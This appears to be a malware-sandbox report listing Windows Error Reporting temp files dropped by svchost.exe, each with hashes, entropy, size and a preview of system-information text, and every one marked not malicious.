                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.688977195758443
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWo5X/829YUYeWVHqYEZm0tFiz7GFbw8NFlPCJaMeDMEkjIQJ3:2ZD4z6yFYJaMeDMEksQJ3
                                                                                                                                                                    MD5:639543FA2DCF78462D095DD9E4CF2DBF
                                                                                                                                                                    SHA1:B43A1AA3CCC97D311573D2BD05257F126536D0AD
                                                                                                                                                                    SHA-256:CD95CF82C57743605779CF5DCFCFC3F560D394408366520B08D78A83E6461650
                                                                                                                                                                    SHA-512:15F76F8590201C7930103AB82AF5503B7FB33967EAC45995E0046D4A02077C302D43876D0D34D3D26BF5F270BA708AA2908806AEFF72385AF93E75C584856AB5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5D6.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6991633600396834
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWfGXgpOgTdY2Ys5rHkpYEZMotFid7BFowQ7X9aWHhqMVkhIw2g:2ZDfGnmdxHEpaWHsMVkew2g
                                                                                                                                                                    MD5:3CF53589A73C618B6126526017191126
                                                                                                                                                                    SHA1:86DD9DE7F03C5C9F16F1BDD650DA073982047DF3
                                                                                                                                                                    SHA-256:E49A22B8F2B4B55427D4A944C0A8E5ECE0129226F4A8BACEAAC2ABFD1CD39518
                                                                                                                                                                    SHA-512:AE61DE179D239891F59118D38EBF549956E082BE867B94CBA632558A105B7163992C2E3005B4B622328B82BEF359442D368BE56D8CA2771B7B48001E41266336
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB0C.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90490
                                                                                                                                                                    Entropy (8bit):3.0550652883928713
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:nMkji+x8hdmmpgYb+WqYjxAjvQS0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+r:nMkji+x8hdmmpgYb+WqYjxAj4S0n+sIu
                                                                                                                                                                    MD5:B738626DC9378E8E03A0721A64385F69
                                                                                                                                                                    SHA1:7869D3FA85B647903374EFC033F290353F657F4F
                                                                                                                                                                    SHA-256:D892E885F6D073B5363CDD7707C1893BD624CDD1124C0D03FB8A09E93C65A21E
                                                                                                                                                                    SHA-512:19F7D0B282C2D110969797E13867A01524AB5D47558305063939D8C4D9085A1FF9D2137FAD7940A44B2767CD05871C5E108117023614AC6E401B3C24B8F854E3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCBB8.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.689359717672588
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWEtd+XYZYBWWTHqYEZfjDtFib7WFLwoN5tasHbMskwIGF3:2ZDDuTjDDasHbMskHGF3
                                                                                                                                                                    MD5:D53619AB389C743C9D6D982E4A665208
                                                                                                                                                                    SHA1:4F8522F2C4FCCF525872FD487B3F378072B3B058
                                                                                                                                                                    SHA-256:8AA61F3341B4486D0B19785F3CD47D170F9B314AD3AFB01A149E3BBA48E0D738
                                                                                                                                                                    SHA-512:6A485A7CA251015F7CE5072D205AC9E63CDDCC78C88071DCD29E11E2EE5C7A9B35CE532D670B4B3F8C9EE5DC321CD63C52013664698F1ECCAF60CA9C28F894D6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD57D.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90492
                                                                                                                                                                    Entropy (8bit):3.0551121387527895
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:KMr7rF8hdzmpRQb+Mkv9wtjvJS0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+mZ:KMr7rF8hdzmpRQb+Mkv9wtjhS0n+sI+Y
                                                                                                                                                                    MD5:C58DE9BC5F0D199A3ACA5A0CBAD7909D
                                                                                                                                                                    SHA1:1F301D4D8668A4AC85CF3985157D15DF96994134
                                                                                                                                                                    SHA-256:5109EABC90B4571A76789DB2A0185E66A1748972A352EAEE52A90171ED1A7B38
                                                                                                                                                                    SHA-512:5C04F135436D65E1714525F3831FF2E3F1442692C21DFE75D297F07619EB521A2EFB5D1CE1853EF1BD48279350DBA9BF159F573AC24CEADF503BA2547F65DCBE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD688.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6955229598355133
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWG2STo2Y9YUWAHqYEZXrKtFiT7CF4DwEaNmwpasHxM1kKIR2J:2ZDMLqur50rasHxM1k9R2J
                                                                                                                                                                    MD5:4D2B85CD0A8EC4B5E00BD402C2D07EF8
                                                                                                                                                                    SHA1:CD475B3F612AC947A889A1E486773316628242A3
                                                                                                                                                                    SHA-256:28E58F75B29B9886592B2329989ED8F93CDD079349F3D00567587A31B58E5B42
                                                                                                                                                                    SHA-512:17A0F24521842CD454870A8B5407CF6016B7A356CFB4940904FF35C749338441BA174FDFA06DFCF5C2793A1A3D7FDB061F0441E4E4CE333C9F909A6BF3CF7C7E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDEC.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90838
                                                                                                                                                                    Entropy (8bit):3.0549333943877612
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:2MUJLIhodzQpR8b+KQz9FEjvk0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+s:2MUJLIhodzQpR8b+KQz9FEjc0n+sI+EP
                                                                                                                                                                    MD5:7CADC657E7EF992B539EFFC8AE716B95
                                                                                                                                                                    SHA1:57A7D84F11A283322D4D787E23D7B601A614D628
                                                                                                                                                                    SHA-256:5CF46FACC71EC7613724A6D6F8009D6450678951BEC3FB498DAE51AD99EDAD98
                                                                                                                                                                    SHA-512:4FC7B22E81D0001A09F3873A5CD05B09B38AA3CCC8E1AC21C547E00720DFF50483605C7F75BAF7273930B2E19AD0DAE0B206CCF483422C856B8EF2014DE569E1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDEA8.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.695168056032369
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWicY+1YmYRW8HqYEZZytFiPC7TFGwGNR4ia9HLMak6UI02O:2ZDThJ5Rva9HLMak6D02O
                                                                                                                                                                    MD5:95F532102CFFEA6895B74DA8DA4C0F3C
                                                                                                                                                                    SHA1:06753F552BA4BC629A835C4CA0BE212BF5ACA2C9
                                                                                                                                                                    SHA-256:0443C22B9D5A3527086BB417D323113A8997CFCE5B1B266A5046CD2178D338D4
                                                                                                                                                                    SHA-512:0A7FA68DCB457DFE98D825D20F47907F7C7A1D8F85F1D9D68852E8D59270CB46A04F701E582090B4ADAE786FFD281908F14D387F457869F8FF549F830FD26DF0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5CD.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90846
                                                                                                                                                                    Entropy (8bit):3.0549286622039356
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:GLMA+aIhodfQpRKb3Nz9Omjvk0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+r:GLMA+aIhodfQpRKb3Nz9Omjc0n+sI+EA
                                                                                                                                                                    MD5:C4367D740DC515363A556E104BCF792A
                                                                                                                                                                    SHA1:4C38C4789E936827D20429037B1943136D74DB3C
                                                                                                                                                                    SHA-256:FCFEF5DCFF874BCCBD6B4FB2DBF8FEBACEC73E29EA3DF335075818E132082189
                                                                                                                                                                    SHA-512:905F88947678A8F4719389637C84533367DEAA0A1BD168FB06BF5848D6F191C0E977FCE23F1FED4821D496703F7821297EA9D20C5D7750B3F22A6ADCEF6E5FC5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6A9.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.695109106360445
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWD0caiFA9YFYcWqHqYEZhttFi37pFAwPNrmaVHzMPk4IL2R:2ZDrK9is8yaVHzMPkfL2R
                                                                                                                                                                    MD5:83BAB01691479BEA885E7BA21CCC2136
                                                                                                                                                                    SHA1:259AF72AA6581FBFDB064258956367221E5C1077
                                                                                                                                                                    SHA-256:CB6A0E2FF91845CF8006EF62A58B9CAD261AA28D7522C168AB04EAF2FCC8FB4C
                                                                                                                                                                    SHA-512:758A5B5379EFADA9A8D807155D86AFF6F9AE48D201951220E912E3ECB5BED2487F8424686BA65F130D35989B8AB73D7D9BC2F9D31AD232E2D365C86AB16D337C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE892.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):93284
                                                                                                                                                                    Entropy (8bit):3.05138660210302
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:7/9ycOh4qexLD72Rszsyja8Hod+70n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+HZ:7/9ycOh4qexLD72Rszsyja8Ho870n+sy
                                                                                                                                                                    MD5:A078B4799EF5D2F3F84D2D62111A3ABD
                                                                                                                                                                    SHA1:6F7DB08DBCFBF15E2999CEA036D2AD5B3137AEB1
                                                                                                                                                                    SHA-256:95A87C3E75CAB3015502FFA91EFAFEC4398704ADFD423CA6A67824C099790095
                                                                                                                                                                    SHA-512:EA9B6B8602C1ED5D2628D96CF51F3DC197D611A7FDEB3834B7B7DC1E49E24217A3C70A12B097886BA257026BF29CFDB20E797C7E34F655097FD217F2CF2F8D01
                                                                                                                                                                    Malicious:false
